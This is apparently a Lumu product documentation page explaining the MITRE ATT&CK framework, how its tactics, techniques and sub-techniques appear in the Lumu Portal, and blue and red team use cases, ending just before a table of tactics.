The MITRE Corporation is a nonprofit organization founded in 1958 that supports various U.S. government agencies at the highest levels. MITRE ATT&CK®, which stands for Adversarial Tactics, Techniques, and Common Knowledge, is a comprehensive matrix and knowledge base of over 200 cyber attacker tactics, techniques, and procedures. Defenders can use the matrix to classify attacker activity, assess an organization’s risk, and understand the best options for defense. One of the reasons for the popularity of ATT&CK is its shared language that enables clear communication among the cyber defense community about the precise characteristics of a threat.
ATT&CK aims to improve post-compromise detection of adversaries in enterprises by illustrating the cyber adversary behavior within an organization network. It helps to identify the nature of a compromise, point out what controls should protect against it, and eventually regulate how effective the organization’s defense is. Even though not intended to provide a checklist of all the things that need to be addressed, the clear focus on adversarial behavior provided by ATT&CK is the best way to detect and terminate an ongoing attack before a data exfiltration happens.
The Enterprise ATT&CK Matrix implemented in the Lumu Portal comprises 12 columns representing Tactics (the adversary’s objective) which are expanded granularly into specific known adversarial methods. Techniques and Sub-techniques represent steps an attacker would typically follow when attacking your infrastructure. Depending on the adversary’s objective, multiple techniques can be applied, but not all tactics need to be employed.
TTPs can be translated into adversarial behaviors. When using these types of indicators to detect and respond to malicious activities, your organization directly handles the attacker’s actions, not only their specific software programs or tools. Blocking indicators such as hash values, IP addresses, domain names is relatively easy for an attacker to circumvent. However, when your organization can respond to the attacker’s TTPs promptly, the adversary needs to learn new behaviors, which can be more difficult and time-consuming to get around.
Techniques represent “how” adversaries can achieve their tactical goals and also “what” an attacker gains by completing an action. For example, the Persistence tactic can include techniques such as Hijack Execution Flow, BITS Jobs, and External Remote Services. Each of these is a single technique that attackers may use to reach the goal of persistence. In some cases, different tactics may use the same techniques. Sub-techniques are a more specific representation of the attacker’s behavior. Techniques are referenced in ATT&CK as Txxxx, and sub-techniques as Txxxx.xxx. For example, the “Use Alternate Authentication Material” technique has the ID T1550, and the sub-technique “Windows Command Shell” has the ID T1059.003.
Lumu Portal provides a visualization with technical detail at the technique level and the relationship with the context around the tactical level. The ATT&CK Matrix is available for each malicious activity in the context area of the Lumu Portal. By default, the techniques associated with each incident found are highlighted in the MITRE ATT&CK Matrix. Figure 2 is an example of how the Lumu Portal presents different techniques used by a threat in an incident.
When you click on a technique or sub-technique, you can find a description, references, and research highlighting specific Procedures for describing how an adversary implements that given technique. In this area, you have the ID, name, description, the platforms affected by the technique/sub-technique, and the link from MITRE that contains procedures examples, mitigations, and references.
The ATT&CK framework implemented in the Lumu Portal is designed to map the adversaries’ TTPs and help organizations answer questions such as: What are their goals? How did they get inside? How are they circulating? What might they do next? And with that information in hand, determine the best way to prepare for and stop an attack in a precise manner.
There are many benefits of taking advantage of the MITRE ATT&CK Matrix when it comes to Incidents reported in the Lumu Portal, some of which have already been mentioned, such as identifying gaps in defenses and making more accurate decisions about imminent risks.
These are some use cases for the ATT&CK Framework:
‘Blue team’ is how we identify the security professionals responsible for proactively maintaining the organization’s infrastructure defenses against all cyberattacks, risks, and threats. With the ATT&CK context provided in the Lumu Portal, these teams can quickly identify the adversary and techniques used in a current attack and ultimately provide recommendations to increase the organization's cybersecurity readiness posture.
Knowing how you are being attacked is as essential as knowing your defense capabilities. Mapping your defense controls on the ATT&CK matrix can provide a clear view of which adversaries’ behaviors you can defend against and how you need to tune your detection and response capabilities. The technique information supplied by the ATT&CK can help your organization to more precisely identify gaps in your threat intelligence infrastructure, assess risks, prioritize, and plan for mitigation.
Overlapping your current cybersecurity infrastructure with the identified threats of your industry and the incidents detected by Lumu in your organization allows you to fill the gaps in your defense and reduce redundancies.
‘Red teams’ are internal or external teams dedicated to testing a cybersecurity infrastructure’s effectiveness by emulating possible adversaries’ tools and techniques in the most realistic way possible. The MITRE ATT&CK context allows red teams to select tactics and the sequence of techniques to model real-world adversaries. This adversarial approach can help organizations assess their prevention, detection, remediation, and eradication performance against these actual threats.
One of the top use cases for the ATT&CK Framework is to support your organization in testing its cybersecurity solutions’ efficacy. The red teams can take advantage of the context information provided by the ATT&CK Matrix in the Lumu Portal to build models that emulate adversaries’ behaviors and test the organization’s security controls. Organizations can also use the context ATT&CK information to automate security validation testing by using breach and attack simulation systems that apply the MITRE ATT&CK framework.
The following table summarizes the 12 tactics in the MITRE ATT&CK Enterprise framework that you can find in the context information of Lumu Portal: